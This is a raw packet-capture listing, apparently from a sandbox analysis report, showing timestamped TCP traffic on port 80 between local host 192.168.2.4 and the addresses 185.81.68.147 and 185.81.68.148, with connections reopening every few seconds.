                                                              Dec 13, 2024 07:47:47.614355087 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.614363909 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.614373922 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.614404917 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.614454031 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.614463091 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.614470005 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.614501953 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.614511013 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.614552975 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.614562988 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.614572048 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.614597082 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615103006 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615113020 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615119934 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615128994 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615144968 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615154982 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615163088 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615173101 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615189075 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615197897 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615209103 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615238905 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615255117 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615284920 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615330935 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615340948 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615411043 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615421057 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615431070 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615442038 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615551949 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615561008 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615794897 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615894079 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615910053 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615921021 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.615958929 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616031885 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616040945 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616070986 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616117001 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616149902 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616159916 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616282940 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616292000 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616300106 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616309881 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616318941 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616327047 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616336107 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616345882 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616354942 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616363049 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616372108 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616636992 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616672993 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616714954 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616760969 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616770029 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616780043 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616812944 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616847038 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616858006 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616966963 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616976023 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616983891 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.616991997 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617002010 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617010117 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617018938 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617027998 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617037058 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617263079 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617286921 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617296934 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617317915 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617382050 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617391109 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617398977 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617460012 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617469072 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617480040 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617507935 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617552042 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617562056 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617594004 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617685080 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617693901 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617703915 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617712021 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617734909 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617772102 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.617780924 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618168116 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618197918 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618207932 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618216038 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618227959 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618252993 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618302107 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618311882 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618427038 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618436098 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618443966 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618467093 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618475914 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618484020 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618493080 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618510008 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618518114 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618527889 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618531942 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618535042 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618540049 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618547916 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618812084 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618819952 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618859053 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618868113 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618875980 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618886948 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618941069 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618949890 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.618972063 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619025946 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619035006 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619122028 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619132996 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619139910 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619148970 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619386911 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619445086 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619453907 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619462013 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619525909 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619535923 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619544029 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619554043 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619565010 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619590044 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619599104 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619627953 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619637012 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619714975 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619724035 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619731903 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619817972 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619828939 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619837046 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.619847059 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.620042086 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.620059013 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.620068073 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.620156050 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.620165110 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.620172977 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.620187998 CET8049780185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.620321989 CET4978080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.620368958 CET8049774185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.620434999 CET4977480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.620568037 CET4978080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.721702099 CET8049779185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:47.740546942 CET8049780185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:48.910877943 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:48.911029100 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:48.962125063 CET8049779185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:48.962189913 CET4977980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:48.976391077 CET8049780185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:48.976475000 CET4978080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:48.989902973 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:48.989949942 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:49.022649050 CET8049778185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:49.022753954 CET4977880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:49.099627018 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:49.099699974 CET4977880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:50.474495888 CET4977980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:50.474797010 CET4978180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:50.489097118 CET4978080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:50.489305019 CET4978280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:50.594686985 CET8049781185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:50.594742060 CET8049779185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:50.594835997 CET4978180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:50.594854116 CET4977980192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:50.595118999 CET4978180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:50.608979940 CET8049782185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:50.609064102 CET4978280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:50.609204054 CET4978280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:50.609246016 CET8049780185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:50.609302044 CET4978080192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:50.714853048 CET8049781185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:50.728914022 CET8049782185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:51.956243992 CET8049781185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:51.956355095 CET4978180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:51.970979929 CET8049782185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:51.971086979 CET4978280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:53.582133055 CET4978180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:53.582457066 CET4978380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:53.597501040 CET4978280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:53.597822905 CET4978480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:53.702563047 CET8049783185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:53.702584028 CET8049781185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:53.702732086 CET4978180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:53.703975916 CET4978380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:53.717587948 CET8049784185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:53.717696905 CET8049782185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:53.717850924 CET4978280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:53.717863083 CET4978480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:53.744865894 CET4978380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:53.744990110 CET4978480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:53.864720106 CET8049783185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:53.864741087 CET8049784185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:55.049388885 CET8049783185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:55.049501896 CET4978380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:55.064470053 CET8049784185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:55.064565897 CET4978480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:56.642441988 CET4978380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:56.642786026 CET4978580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:56.642853975 CET4978480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:56.643071890 CET4978680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:56.762583971 CET8049785185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:56.762614965 CET8049783185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:56.762676954 CET4978580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:56.762702942 CET4978380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:56.762734890 CET8049786185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:56.762789965 CET4978680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:56.763117075 CET8049784185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:56.763159037 CET4978480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:56.763964891 CET4978580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:56.764127970 CET4978680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:56.883723021 CET8049785185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:56.883744001 CET8049786185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:58.114767075 CET8049785185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:58.114862919 CET4978580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:58.126125097 CET8049786185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:58.126332045 CET4978680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:59.739603996 CET4978580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:59.743334055 CET4978880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:59.771143913 CET4978680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:59.774702072 CET4978980192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:59.859814882 CET8049785185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:59.859906912 CET4978580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:59.863114119 CET8049788185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:59.863423109 CET4978880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:59.863554001 CET4978880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:59.891469955 CET8049786185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:59.891546011 CET4978680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:59.895128965 CET8049789185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:59.895204067 CET4978980192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:59.895382881 CET4978980192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:59.983375072 CET8049788185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:00.015284061 CET8049789185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:01.203928947 CET8049788185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:01.205893040 CET4978880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:01.236268044 CET8049789185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:01.236423969 CET4978980192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:02.707104921 CET4978880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:02.707606077 CET4979180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:02.737979889 CET4978980192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:02.738318920 CET4979280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:02.827239037 CET8049788185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:02.827337027 CET4978880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:02.827363014 CET8049791185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:02.827445030 CET4979180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:02.827611923 CET4979180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:02.858200073 CET8049789185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:02.858218908 CET8049792185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:02.858292103 CET4978980192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:02.858361959 CET4979280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:02.858550072 CET4979280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:02.947280884 CET8049791185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:02.978322029 CET8049792185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:04.193331957 CET8049791185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:04.196094990 CET4979180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:04.221220970 CET8049792185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:04.221930027 CET4979280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:05.822551966 CET4979180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:05.823026896 CET4980380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:05.848987103 CET4979280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:05.849322081 CET4980480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:05.942859888 CET8049803185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:05.943042994 CET4980380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:05.943116903 CET8049791185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:05.943190098 CET4979180192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:05.943409920 CET4980380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:05.969103098 CET8049804185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:05.969158888 CET8049792185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:05.969258070 CET4979280192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:05.969321966 CET4980480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:05.969510078 CET4980480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:06.063162088 CET8049803185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:06.089215994 CET8049804185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:07.283026934 CET8049803185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:07.284181118 CET4980380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:07.314804077 CET8049804185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:07.316421986 CET4980480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:08.785365105 CET4980380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:08.785649061 CET4981080192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:08.831926107 CET4980480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:08.832509995 CET4981180192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:08.905575991 CET8049810185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:08.905761957 CET4981080192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:08.905962944 CET8049803185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:08.906037092 CET4980380192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:08.906168938 CET4981080192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:08.952500105 CET8049804185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:08.952649117 CET4980480192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:08.952666998 CET8049811185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:08.952754974 CET4981180192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:08.952997923 CET4981180192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:09.025865078 CET8049810185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:09.072714090 CET8049811185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:10.268330097 CET8049810185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:10.268444061 CET4981080192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:10.289942980 CET8049811185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:10.290034056 CET4981180192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:11.896945953 CET4981080192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:11.897274017 CET4981780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:11.911309004 CET4981180192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:11.911587954 CET4981880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:12.017038107 CET8049810185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:12.017071009 CET8049817185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:12.017260075 CET4981080192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:12.017354965 CET4981780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:12.017656088 CET4981780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:12.031389952 CET8049818185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:12.031421900 CET8049811185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:12.031621933 CET4981180192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:12.031750917 CET4981880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:12.032008886 CET4981880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:12.137342930 CET8049817185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:12.151762962 CET8049818185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:13.361048937 CET8049817185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:48:13.361383915 CET4981780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:13.377300978 CET8049818185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:48:13.377427101 CET4981880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:48:14.865302086 CET4981780192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:48:14.865572929 CET4982980192.168.2.4185.81.68.147
